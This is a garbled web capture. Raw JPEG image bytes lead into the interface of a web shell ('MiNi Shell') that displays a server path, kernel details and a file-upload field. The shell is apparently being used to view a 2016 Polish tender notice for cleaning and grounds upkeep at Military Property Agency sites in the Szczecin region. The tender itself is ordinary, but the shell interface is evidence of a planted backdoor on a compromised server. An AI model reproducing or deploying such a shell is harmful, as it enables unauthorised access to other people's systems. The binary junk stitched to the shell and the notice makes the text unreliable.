JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160303/47842-N-2016.html

<p class="kh_header"><b>Szczecin: Utrzymanie porządku i czystości w budynkach, wokół budynków oraz na gruntach wchodzących w skład zasobu Oddziału Regionalnego Agencji Mienia Wojskowego                             w Szczecinie</b><br>
<b>Numer ogłoszenia: 47842 - 2016; data zamieszczenia: 03.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Mienia Wojskowego Oddział Regionalny w Szczecinie , ul. Potulicka 2, 70-952 Szczecin, woj. zachodniopomorskie, tel. 91 489 27 97, 489 27 98 w. 108, faks 91 488 74 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja Mienia Wojskowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie porządku i czystości w budynkach, wokół budynków oraz na gruntach wchodzących w skład zasobu Oddziału Regionalnego Agencji Mienia Wojskowego                             w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: 
Część I:   Stargard,  
Część II:  Koszalin, 
Część III: Szczecin,  
Część IV:  Świnoujście, 
Część V:   Wałcz, Mirosławiec, Oleszno, Nadarzyce, 
Część VI:  Kołobrzeg
Część VII:  Świdwin
Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: 
Część I:  Stargard, Goleniów, Choszczno
Część II: Koszalin, Rosnowo
Część III: Szczecin, Kołbaskowo
Część IV: Świnoujście, Dziwnów, Kołczewo
Część V: Wałcz, Mirosławiec, Cybowo, Szczecinek, Złocieniec, Oleszno,  Głębokie
Część VI: Kołobrzeg,  Mrzeżyno, Gryfice, Jaromin
Część VII: Świdwin
Zakres prac będących przedmiotem zamówienia:
Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie:
utrzymanie w ciągłej czystości poprzez zamiatanie klatek schodowych, korytarzy piwnicznych, pomieszczeń pralni, suszarni, wózkowni i innych pomieszczeń ogólnodostępnych,
mycie wodą z proszkiem, płynem lub mydłem podestów, biegów stopni na klatkach schodowych, nie rzadziej niż 2 razy w miesiącu,
mycie lamperii na klatkach schodowych i w pralniach, nie rzadziej niż l raz w miesiącu, 
utrzymywanie w ciągłej czystości toalet, które znajdują się w części wspólnej budynku 
mycie barierek, poręczy wraz ze słupkami, grzejników, drzwi wejściowych do klatek schodowych, nie rzadziej niż l raz w tygodniu,
mycie okien, kloszy oświetleniowych na klatkach schodowych, w pralniach, suszarniach i korytarzach piwnicznych, l raz na kwartał,
w przypadku silnych zabrudzeń klatek schodowych mycie winno odbywać się na bieżąco, 
usuwanie zgromadzonych nieczystości, mebli z piwnic do miejsc do tego przeznaczonych- w uzgodnieniu z zarządcą, 
sprzątanie daszków nad wejściami do budynków według potrzeb,
w przypadku zgromadzenia nieczystości wokół różnego rodzaju pojemników, zbieranie ich do pojemników, w razie potrzeby workowanie nieczystości,
usuwanie z budynków plakatów, reklam i ogłoszeń wywieszanych bez zgody Zamawiającego,
czynności związane z dezynfekcją, dezynsekcją i deratyzacją wewnątrz budynku oraz na terenie przyległym 2 razy w roku.
Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości wokół budynków - tereny zewnętrzne:
codziennie sprzątanie chodników, ulic, podwórzy, dróg osiedlowych, dojść do osłon śmietnikowych,
w miarę potrzeb, w sezonie letnim, zmywanie chodników, 
w okresie jesiennym zgrabianie i uprzątanie na bieżąco liści opadowych, workowanie i ich wywożenie, 
w okresie zimowym utrzymanie terenów w należytym i bezpiecznym stanie,
codzienne sprzątanie osłon śmietnikowych wraz z dezynfekcją 1 raz w miesiącu,
składanie zebranych nieczystości do pojemników na śmieci i w miejscach do tego przeznaczonych (osłony śmietnikowe), a w razie potrzeby workowanie ich,
w sezonie zimowym oczyszczanie z lodu, śniegu i błota jezdni na drodze osiedlowej z parkingów, chodników, hydrantów pożarowych (aby były widoczne), dojść do budynków i pojemników na nieczystości oraz wpustów ulicznych wraz z układaniem śniegu w pryzmy w sposób umożliwiający spływ wody w czasie odwilży, a w przypadku ciągłych opadów śniegu usuwanie na bieżąco,
posypywanie piaskiem powierzchni dróg i chodników w czasie gołoledzi i po opadach- czynności te winny być wykonywane w sposób ciągły przy ciągłych opadach śniegu lub gołoledzi (piasek i pojemniki na piasek zabezpiecza Wykonawca), 
czyszczenie krawężników i chodników z przerastającej darniny w miejscach
wskazanych przez administrację,
usuwanie śniegu oraz sopli z dachów (w razie konieczności użycia podnośnika, koszt podnośnika pokrywa Zamawiający, po uprzedniej akceptacji kosztów).
stała konserwacja trawników:
sprzątanie z porozrzucanych nieczystości typu śmieci, papiery,
w okresie jesiennym zgrabianie i uprzątanie na bieżąco liści opadowych,
przekopywanie miejsc wydeptanych z wysiewem traw i nawożeniem mineralnym, w miarę  potrzeb w uzgodnieniu z administracją (max. do 10 % powierzchni trawników w ciągu roku),
nawiezienie ziemi urodzajnej z jej rozplanowaniem i wałowaniem -                        w miarę potrzeb w uzgodnieniu z administracją,
koszenie trawników (ilość koszeń uzależniona od warunków pogodowych                         i potrzeb), nie rzadziej niż 4 razy w sezonie, po uzgodnieniu                                   z administracją,
grabienie sukcesywnie skoszonej trawy z wywozem na wysypisko,
nawożenie mineralne trawników - jeden raz w sezonie,
rekultywacja trawników - w miarę potrzeb w uzgodnieniu z administracją (max. do 10 % powierzchni trawników w ciągu roku), 
podlewanie terenów zielonych (w miarę potrzeb)
stała konserwacja żywopłotów:
nawożenie mineralne - jeden raz w sezonie,
odmładzanie żywopłotów, dosadzanie - 1 raz w roku w uzgodnieniu                      z administracją (max. 10 % w linii nasadzeń w ciągu roku),
przecinanie i formowanie żywopłotów, w miarę potrzeb, w uzgodnieniu                     z administracją - nie rzadziej niż 2 razy w roku,
stała konserwacja drzew i krzewów,
pielenie oraz wykonanie misek do podlewania (min. 2 razy w okresie letnim),
prace sanitarne w koronach drzew - w miarę potrzeb w uzgodnieniu                            z administracją,
podlewanie - w miarę potrzeb (dotyczy drzew i krzewów młodocianych),
uzupełnianie brakujących ochron krzewów i drzew oraz palikowanie 
i zabezpieczanie w miarę potrzeb,
wywóz gałęzi po przycince krzewów i drzew,
stała konserwacja kwietników i różanek (odmładzanie nasadzeń kwietników 
i różanek według uzgodnień z administracją),
wywóz starego piasku z piaskownic, nawiezienie świeżego w uzgodnieniu                        z Zamawiającym przynajmniej 3 razy w roku (koszt piasku oraz jego dowóz pokrywa Zamawiający po uprzednim pisemnym zaakceptowaniu kosztów).
Prace ogólne:
wykonanie stałego nadzoru nad stanem użytkowo-technicznym budynków                      i terenów przyległych,
bieżące zgłaszanie zauważonych usterek,
awiadamianie o rażących lub uporczywych wypadkach naruszania przez lokatorów Regulaminu Porządku Domowego,
dostarczanie lokatorom wszelkiego rodzaju informacji, zawiadomień o zmianie wysokości opłat czynszowych  oraz wywieszanie ogłoszeń w terminach określonych przez Zamawiającego,
zobowiązanie się do nieprzetwarzania (udostępniania) osobom trzecim danych zawartych w korespondencji doręczanej przez pracowników Wykonawcy lokatorom w obsługiwanym rejonie,
zapoznanie się z postanowieniami ustawy z dn. 29.08.1997 r. o ochronie danych osobowych (tekst jednolity Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.) - w szczególności art. 51 o odpowiedzialności za naruszanie postanowień tej ustawy,
zapoznanie się ze sposobem zawiadamiania poszczególnych służb                                   w przypadku  wystąpienia zagrożeń oraz z obowiązującymi przepisami p.poż, BHP itp.,
wykonanie zleceń prac zgodnie z zachowaniem należytej staranności oraz zapewnieniem bezpieczeństwa BHP i p.poż,
wywieszanie flag dostarczonych przez Zamawiającego na budynkach 
i w terminach podanych przez Zamawiającego,
zawiadamianie Zamawiającego o stwierdzonych faktach niewykonania usługi przez firmę wywożącą odpady komunalne oraz zgłaszanie faktów kradzieży, dewastacji i podpaleń  pojemników na odpady komunalne.
Zadanie 2 . 
Szczegółowe zadania i obowiązki Wykonawcy w zakresie utrzymania porządku 
i czystości terenów, według bieżących potrzeb Zamawiającego:
tereny zielone niezabudowane - zbieranie wszelkiego rodzaju śmieci, zagrabianie liści, wywożenie zebranych śmieci i liści na składowisko,
koszenie trawy - koszenie, zgrabienie  i wywiezienie skoszonej trawy na składowisko,
odśnieżenie chodników w okresie zimowym - usuwanie śniegu z chodników, posypanie piaskiem.
tereny utwardzone - zbieranie wszelkiego rodzaju śmieci, zamiatanie, wywożenie zebranych śmieci na składowisko,
Wykonawca będzie wykonywał ww. usługi w miarę potrzeb Zamawiającego, na osobno udzielane zlecenia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 77.31.40.00-4, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wam.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jw..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 10:00, miejsce: Oddział Regionalny Agencji Mienia Wojskowego w Szczecinie ul. Potulicka 2, pokój nr 18 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I:	zadanie 1- Stargard,  zadanie 2- Stargard, Goleniów, Choszczno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m. Stargard 
2Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: Stargard, Goleniów, Choszczno.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II:	zadanie 1- Koszalin,  zadanie 2- Koszalin, Rosnowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Koszalin, 
2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: Koszalin, Rosnowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III:	zadanie 1- Szczecin,  zadanie 2- Szczecin, Kołbaskowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Szczecin,  
2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: Szczecin, Kołbaskowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.62.00.00-9, 77.31.40.00-4, 90.61.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV:	zadanie 1- Świnoujście, zadanie 2- Świnoujście, Dziwnów, Kołczewo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Świnoujście, 
2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: Świnoujście, Dziwnów, Kołczewo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.40.00-7, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 77.31.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji na usługi dotyczące zadania nr 2 (nie dłuższy niż 72 godziny) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V:	zadanie 1- Wałcz, Mirosławiec, Oleszno, Nadarzyce,
zadanie 2- Wałcz, Mirosławiec, Cybowo, Szczecinek, Złocieniec, Oleszno,   Głębokie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
1)	Zadanie 1. 
Kompleksowe świadczenie usług  polegających na ciągłym i powtarzającym się utrzymaniu w czystości i porządku nieruchomości (wewnątrz i na zewnątrz) Oddziału Regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych w m: Wałz, Mirosławiec, Oleszno, Nadarzyce, 

2)	Zadanie 2. 
Świadczenie usług związanych z utrzymaniem porządku i czystości, zlecanych do realizacji według bieżących potrzeb  Zamawiającego, na terenach Oddziału regionalnego Agencji Mienia Wojskowego w Szczecinie, zlokalizowanych                                        w miejscowościach: 
Wałcz, Mirosławiec, Cybowo, Szczecinek, Złocieniec, Oleszno,  Głębokie.</p></li>
